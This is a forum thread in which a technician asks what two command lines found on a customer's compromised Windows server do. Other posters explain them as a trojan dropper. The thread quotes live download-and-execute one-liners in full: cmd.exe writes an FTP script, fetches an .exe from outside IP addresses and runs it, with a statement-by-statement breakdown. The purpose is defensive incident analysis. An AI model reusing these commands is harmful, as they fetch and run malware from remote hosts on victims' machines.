What do these commands do 1

[dparrott]

A customer of mine had the following two commands in the run area of their server. They run on a 192.168 subnet, so these go to the outside.

cmd.exe /c del i&echo open 66.244.112.148 15635 > i&echo user 1 1 >> i &echo get 140.exe >> i &echo quit >> i &ftp -n -s:i &140.exe&del i&exit


cmd.exe /c del i&echo open 66.244.112.248 13544 > i&echo user 1 1 >> i &echo get 446.exe >> i &echo quit >> i &ftp -n -s:i &446.exe&del i&exit

The server was beeping at them, and VNC (which has been unistalled, and Remote Desktop has been disabled, along with remote assistance) was accepting a connection from 66.244.X.X. The computer was always locked the times that I heard it, so VNC would not have allowed them to run anything. I have also started a virus scan and will do both Hijack this and ad-aware scans when I am there next, as I believe they have been compromised. I will also strongly advise them to change all of their passwords. I also have not searched for 446.exe either, yet.

This is beyond my understanding of CLI environments.
Thanks for your help in advance.

Danny

 

[pagy]

Definitely looks like something nasty has got on the machine.

All you can do is as you say, virus scan (I would use an on line scanner rather than the AV on the machine as it may have been compromised) scan for spyware, malware, change all passwords.

Is this server behind a hardware firewall?, if it is disable any port forwarding to the server.

All you need in this life is ignorance and confidence; then success is sure.
- Mark Twain

 

[dparrott]

Thanks for reinforcing that something is there. Any ideas about the original question of what the CLI commands do?

 

[pagy]

It looks like a trojan that creates and runs an ftp script to download 446.exe from the those IP addresses.

All you need in this life is ignorance and confidence; then success is sure.
- Mark Twain

 

[pagy]

FYI

If you wanted you could use

http://www.dnsstuff.com

to find out where those IP addresses are in the world.

All you need in this life is ignorance and confidence; then success is sure.
- Mark Twain

 

[dparrott]

Pagy,

Thanks for answering the original question. I was hoping for something like "/c causes cmd.exe to open silently, del deletes i&echo ..." As I said, the cli stuff is more advanced than I am and the i&'s are really throwing off my interpretation of if.

 

[pagy]

The /c just means run this in a command shell and then terminate

All you need in this life is ignorance and confidence; then success is sure.
- Mark Twain

 

[dparrott]

I already had found out where the IP address is from. It comes from an ISP in Ellotsville Indiana.

What does "del i&echo open 66.244.112.148 15635 " do?
I recognize the IP address, and then the port, but the "del i&echo open" part is throwing me off.

The ">" redirects the output.

What does "i&echo user 1 1" do?

the ">>" redirects the output, appending it this time.

What does "i&echo get 140.exe" do?

the ">>" redirects the output, appending it this time.

What does "i&echo quit" do?

the ">>" redirects the output, appending it this time.

What does "i&ftp -n -s:i &140.exe&del i&exit" do?

I understandably don't want to run these commands to find out what they do because of the security implacations. I am not looking for advice on how to fix the problem. I am looking for an explanation along the lines of pagy's last post, but for the entire series of commands.

Thanks in advance

 

[Roadki11]

I helped a guy with this issue before. Not only are you probably infected but i bet you are running an older exploitable version of VNC that is exposed to the internet. Need to get that updated ASAP. Checkout the following link for more info.

http://www.tek-tips.com/viewthread.cfm?qid=1307641&page=2

Hope this helps,

Roadki11

 

[pagy]

I found the following;

The site 81.64.226.142 uses TCP port 28162
The account is 1 and the password is 1
The script tries to FTP Get 364.exe and then execute 364.exe
It is musch like using the FTP URL...
f*p://1:1@81.64.226.142:28162/364.exe


The site 81.64.46.76 uses TCP port 27055
The account is 1 and the password is 1
The script tries to FTP Get 818.ex and then execute 818.ex
It is musch like using the FTP URL...
f*p://1:1@81.64.46.76:27055/818.exe

*NOTE: FTP URLs obfuscated

See this link for the whole thread

http://help.lockergnome.com/security/strange-commands-run-execute-windows-ftopict10350.html

All you need in this life is ignorance and confidence; then success is sure.
- Mark Twain

 

[dparrott]

Thanks guys. I know what was happening. What are all the "i&" ? I am not looking for a high level explanation of the whole thing, but a lower level statement by statement explanation.

 

[crobin1]

OK, here goes. The ampersand is a statement separator, this lets the commands be all on one line and run one after the other. Spaces are optional in some contexts, so for instance the i is actually separate from the ampersand.

cmd.exe /c del i&echo open 66.244.112.148 15635 > i&echo user 1 1 >> i &echo get 140.exe >> i &echo quit >> i &ftp -n -s:i &140.exe&del i&exit

del i - delete a file named i
echo open 66.244.112.148 15635 > i - echo the statement to a file called i
echo user 1 1 >> i - same thing
echo get 140.exe >> i - same thing
echo quit >> i - same thing
ftp -n -s:i - start FTP, use commands in the script named i
140.exe - execute the program downloaded by the FTP script
del i - del the file named i

Does that help?

 

[dparrott]

That was exactly what I was looking for. Thank you very much. I gave you a star for this.

Danny